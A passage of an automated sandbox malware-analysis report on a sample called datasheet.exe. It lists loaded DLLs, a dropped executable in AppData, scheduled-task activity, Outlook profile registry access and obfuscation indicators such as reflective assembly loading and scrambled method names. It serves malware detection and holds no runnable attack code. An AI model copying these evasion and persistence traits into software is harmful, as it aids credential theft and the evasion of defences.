Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\datasheet.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\datasheet.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: datasheet.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: datasheet.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: datasheet.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Ffsv.pdb | source: datasheet.exe, EhzaIxEFbjyd.exe.0.dr
                    Source: Binary string: Ffsv.pdbSHA256 | source: datasheet.exe, EhzaIxEFbjyd.exe.0.dr

                    Data Obfuscation

                    Source: datasheet.exe, MainForm.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: EhzaIxEFbjyd.exe.0.dr, MainForm.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | .Net Code: BIP5McjdoT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | .Net Code: BIP5McjdoT System.Reflection.Assembly.Load(byte[])
                    Source: datasheet.exe | Static PE information: 0xBAD5FF54 [Tue Apr 30 22:31:48 2069 UTC]
                    Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_02B3E768 push esp; retf 0_2_02B3E769
                    Source: C:\Users\user\Desktop\datasheet.exe | Code function: 0_2_0724F8E5 push edi; iretd 0_2_0724F8E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015FA6C8 push F40314CCh; retf 9_2_015FA855
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015F0C45 push ebx; retf 9_2_015F0C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0120A6C8 push F4051BCCh; retf 15_2_0120A855
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_01200C45 push ebx; retf 15_2_01200C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_01200C53 push ebx; retf 15_2_01200C52
                    Source: datasheet.exe | Static PE information: section name: .text entropy: 7.981872933279261
                    Source: EhzaIxEFbjyd.exe.0.dr | Static PE information: section name: .text entropy: 7.981872933279261
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, NylW7JUHhxb7j0BeHn.cs | High entropy of concatenated method names: 'jW1GTkRi5s', 'm37Gm5A6K7', 'E1LGMqn9fD', 'T7uG0THAcA', 'DWFG4Lx9bW', 'YcOGXtgK0X', 'E8OGkMnpSJ', 'URJGeFoqOp', 'NFVws7UwHHCDsTuLePZ', 'YJUiyeUyxhSkQVji6RR'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, Mi7lsy2FiRFrPwBMYi.cs | High entropy of concatenated method names: 's8AMIOlp7', 'k4i0kRmc8', 'utn4OFDo7', 'ctnXF7Uww', 'q9Ik37CJx', 'uLqeoMOXM', 'ov6FTTXodlihE8KlRO', 'bSKJVnZuTClaqxU1Lw', 'xGJpxQOfa', 'CcjwenRgD'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, vvxv4PEt7dXC6fXLp6.cs | High entropy of concatenated method names: 'jmhsR7B0Nq', 'Qjwsgsy55Z', 'U2qsyTmpWk', 'JawsUZqvRI', 'Q7RsQX2Q7e', 'G0KsjMsdQP', 'Pn0sHK8dsH', 'oynsaPJ0mD', 'mFxsZlZ5qg', 'sMLsAqNuc4'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, lv8H2d9G3Iqa4sEWPO.cs | High entropy of concatenated method names: 'NOGONB41Hw', 'crEOcwVKAZ', 'S4aOBNArYd', 'fs4OnD31Vr', 'uCfOSYSxoy', 'PMjO8TSh9o', 'BaiOKO2LZK', 'HUrOr6SRsh', 'D0ROE6V00Y', 'oeGO6UIvQn'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | High entropy of concatenated method names: 'ABZxbCf3WS', 'mPPxDJXcix', 'wx9xOn6FiO', 'TMJxohIScT', 'wAYxLpO1iY', 'g9DxGIYlep', 'fcgxlPniZk', 'p09xJfI4n0', 'J34xq3ln20', 'pb9xYMd5tJ'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, CPPmkRNFv5r53JLsmx.cs | High entropy of concatenated method names: 'asdCAeoAlX', 'fQ4CfVkDTF', 'HdoCNbo2Lm', 'aEDCc6WpUU', 'nE7Cguh8c5', 'QyMCyJGcBW', 'seVCURMk4s', 'y9MCQJuISG', 'HflCjfb7y2', 'MpGCHjOQCI'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, mSgYsTOti3cTYE17og.cs | High entropy of concatenated method names: 'Dispose', 'hgoIETqIgA', 'qQF2gkmhpX', 'LZ2FjVi7Ts', 'RtXI6EPNOi', 'P4IIzUwxGu', 'ProcessDialogKey', 'mnh2Pvxv4P', 't7d2IXC6fX', 'ip622OIErq'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, A9OsSD8vxAmBW3h63P.cs | High entropy of concatenated method names: 'KC5vrVPFJT', 'hRav6IPWjQ', 'dU5pPGwG2P', 'jPxpIKwIBv', 'x1uvFkx0Xf', 'KUmvfeMTdV', 'AXMv7p1vHj', 'cC2vNNkVkj', 'oaqvcqeOxn', 'vCovBQjBgS'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, b14PLreOyPL95jqE2G.cs | High entropy of concatenated method names: 'Ol9LuhSAQr', 'tenLXMKZnq', 'UFZoy9Rep3', 'J3woUst94d', 'kFcoQwCiQB', 'o63ojSZi33', 'hO2oHcn5Gs', 'r6toatOj7W', 'dJioZYYB70', 'kvuoAfyxW6'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, ATDn1PKadogoTqIgAc.cs | High entropy of concatenated method names: 'gHUsCBq44o', 'chNsvf2TdT', 'ghIssoDtQS', 'wojstBRpQ4', 'QI3sihY4aQ', 'pwpsTdiR2k', 'Dispose', 'k1XpD8qTIF', 'fgGpO3HveA', 'hWIpo8BOmN'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, gbqE9akykXACM5vvYv.cs | High entropy of concatenated method names: 'gkUo0VB7lo', 'AvIo4fb5VF', 't8ao9c8YHZ', 'pYjokhLLUZ', 'UjaoC2ggPn', 'JImo3DImZs', 'NI2ovh1Asu', 'SnCoplvhLa', 'AMsosxaMD7', 'krUowDr4fB'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, L4vAxKIIcAZoshGV9H7.cs | High entropy of concatenated method names: 'olww6doItx', 'IYewzR6syG', 'm4ktPnLi9S', 'mvCtIfaG4Q', 'dDlt2cNmxm', 'eIAtxrnEnC', 'JlKt5SDtxB', 'toptbPTuRS', 'zo0tDTTEwe', 'YGNtO0spAF'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, JLCJHyH6c0QTNYmk86.cs | High entropy of concatenated method names: 'jiOlDKKAgl', 'YwWlosEpSq', 'heBlGYUaPi', 'aiRG6SZHOa', 'p22GzyJCx7', 'h0hlPVjahu', 'yOwlIGLSSi', 'i44l2Xn9Df', 'og6lxhcNNo', 'cr0l50M4oG'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, pTw8yI7DDdtg6G8j6r.cs | High entropy of concatenated method names: 'DcIV9VeE8Y', 'JYtVka90eB', 'X3RVR3jAEc', 'LLBVg3C5Ua', 'b1ZVU1hZ35', 'uTMVQiJORf', 'nEnVHcKfOc', 'yo4Va3y0Y0', 'ln3VA0J0BP', 'H9mVFjwMHJ'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, wwpUJiBXK20C4PEluy.cs | High entropy of concatenated method names: 'ToString', 'H5y3F3J0xw', 'dm83gLbwJS', 'u6w3ylEn5D', 'IlU3Ulh6dL', 'M053QGPUo6', 'n4U3jsRRdu', 'fY53HGyZKQ', 'xMS3aqY5Z5', 'KUd3Zb3UGC'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, t0Ige75P2lbOS8wTrY.cs | High entropy of concatenated method names: 'bQYIlv8H2d', 'i3IIJqa4sE', 'LykIYXACM5', 'qvYIdv214P', 'KqEIC2GEvo', 'rWRI3RpNlT', 'wEaOyK2f8VqpLU5H30', 'icTEnfgwPcVEUjKfhK', 'TQ1IIeC9qk', 'DYmIxgK5Gl'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, YvopWRRRpNlTsh2H4Y.cs | High entropy of concatenated method names: 'm8ZGb1BEE7', 'VWhGOhix1R', 'XOyGLf0FTA', 'mXlGlUnvSF', 'DgPGJ3YhAY', 'wG8LSPDbJm', 'RcmL87LndG', 'uBeLKWhHMX', 'L3SLrQkmnG', 'KiLLEdlMbW'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, mEYI0ez9SpMLMxarLw.cs | High entropy of concatenated method names: 'Yhmw44wf2k', 'F3cw9vgl7F', 'O0RwkL6uyG', 'lelwRBdJjG', 'RxAwgMaB8q', 'R6xwU8LC6J', 'AlpwQI4Rsx', 'ymSwTWXpcl', 'rN5wmliVtT', 'HY6w1RlRW8'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, iU3GhDI5CUbqSQqDMK3.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NxpWsrL3Pj', 'SZjWwBpqYO', 'zb9Wtpc5Wq', 'HTAWWW0Wlg', 'S5jWitBm1P', 'hxKWhP77nk', 'CR3WTMPchJ'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, nrIaPAZ4wK9qnJdwHt.cs | High entropy of concatenated method names: 'oCdlmv8FQs', 'zMYl1S4IM1', 'njMlMggGir', 'vKUl08U50I', 'TchluA3CPT', 'eVLl47xRr8', 'BIXlXcQBtE', 'w85l9r1vZr', 'wdZlkXeuES', 'qmBletjJpl'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, NylW7JUHhxb7j0BeHn.cs | High entropy of concatenated method names: 'jW1GTkRi5s', 'm37Gm5A6K7', 'E1LGMqn9fD', 'T7uG0THAcA', 'DWFG4Lx9bW', 'YcOGXtgK0X', 'E8OGkMnpSJ', 'URJGeFoqOp', 'NFVws7UwHHCDsTuLePZ', 'YJUiyeUyxhSkQVji6RR'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, Mi7lsy2FiRFrPwBMYi.cs | High entropy of concatenated method names: 's8AMIOlp7', 'k4i0kRmc8', 'utn4OFDo7', 'ctnXF7Uww', 'q9Ik37CJx', 'uLqeoMOXM', 'ov6FTTXodlihE8KlRO', 'bSKJVnZuTClaqxU1Lw', 'xGJpxQOfa', 'CcjwenRgD'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, vvxv4PEt7dXC6fXLp6.cs | High entropy of concatenated method names: 'jmhsR7B0Nq', 'Qjwsgsy55Z', 'U2qsyTmpWk', 'JawsUZqvRI', 'Q7RsQX2Q7e', 'G0KsjMsdQP', 'Pn0sHK8dsH', 'oynsaPJ0mD', 'mFxsZlZ5qg', 'sMLsAqNuc4'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, lv8H2d9G3Iqa4sEWPO.cs | High entropy of concatenated method names: 'NOGONB41Hw', 'crEOcwVKAZ', 'S4aOBNArYd', 'fs4OnD31Vr', 'uCfOSYSxoy', 'PMjO8TSh9o', 'BaiOKO2LZK', 'HUrOr6SRsh', 'D0ROE6V00Y', 'oeGO6UIvQn'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs | High entropy of concatenated method names: 'ABZxbCf3WS', 'mPPxDJXcix', 'wx9xOn6FiO', 'TMJxohIScT', 'wAYxLpO1iY', 'g9DxGIYlep', 'fcgxlPniZk', 'p09xJfI4n0', 'J34xq3ln20', 'pb9xYMd5tJ'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, CPPmkRNFv5r53JLsmx.cs | High entropy of concatenated method names: 'asdCAeoAlX', 'fQ4CfVkDTF', 'HdoCNbo2Lm', 'aEDCc6WpUU', 'nE7Cguh8c5', 'QyMCyJGcBW', 'seVCURMk4s', 'y9MCQJuISG', 'HflCjfb7y2', 'MpGCHjOQCI'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, mSgYsTOti3cTYE17og.cs | High entropy of concatenated method names: 'Dispose', 'hgoIETqIgA', 'qQF2gkmhpX', 'LZ2FjVi7Ts', 'RtXI6EPNOi', 'P4IIzUwxGu', 'ProcessDialogKey', 'mnh2Pvxv4P', 't7d2IXC6fX', 'ip622OIErq'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, A9OsSD8vxAmBW3h63P.cs | High entropy of concatenated method names: 'KC5vrVPFJT', 'hRav6IPWjQ', 'dU5pPGwG2P', 'jPxpIKwIBv', 'x1uvFkx0Xf', 'KUmvfeMTdV', 'AXMv7p1vHj', 'cC2vNNkVkj', 'oaqvcqeOxn', 'vCovBQjBgS'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, b14PLreOyPL95jqE2G.cs | High entropy of concatenated method names: 'Ol9LuhSAQr', 'tenLXMKZnq', 'UFZoy9Rep3', 'J3woUst94d', 'kFcoQwCiQB', 'o63ojSZi33', 'hO2oHcn5Gs', 'r6toatOj7W', 'dJioZYYB70', 'kvuoAfyxW6'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, ATDn1PKadogoTqIgAc.cs | High entropy of concatenated method names: 'gHUsCBq44o', 'chNsvf2TdT', 'ghIssoDtQS', 'wojstBRpQ4', 'QI3sihY4aQ', 'pwpsTdiR2k', 'Dispose', 'k1XpD8qTIF', 'fgGpO3HveA', 'hWIpo8BOmN'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, gbqE9akykXACM5vvYv.cs | High entropy of concatenated method names: 'gkUo0VB7lo', 'AvIo4fb5VF', 't8ao9c8YHZ', 'pYjokhLLUZ', 'UjaoC2ggPn', 'JImo3DImZs', 'NI2ovh1Asu', 'SnCoplvhLa', 'AMsosxaMD7', 'krUowDr4fB'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, L4vAxKIIcAZoshGV9H7.cs | High entropy of concatenated method names: 'olww6doItx', 'IYewzR6syG', 'm4ktPnLi9S', 'mvCtIfaG4Q', 'dDlt2cNmxm', 'eIAtxrnEnC', 'JlKt5SDtxB', 'toptbPTuRS', 'zo0tDTTEwe', 'YGNtO0spAF'
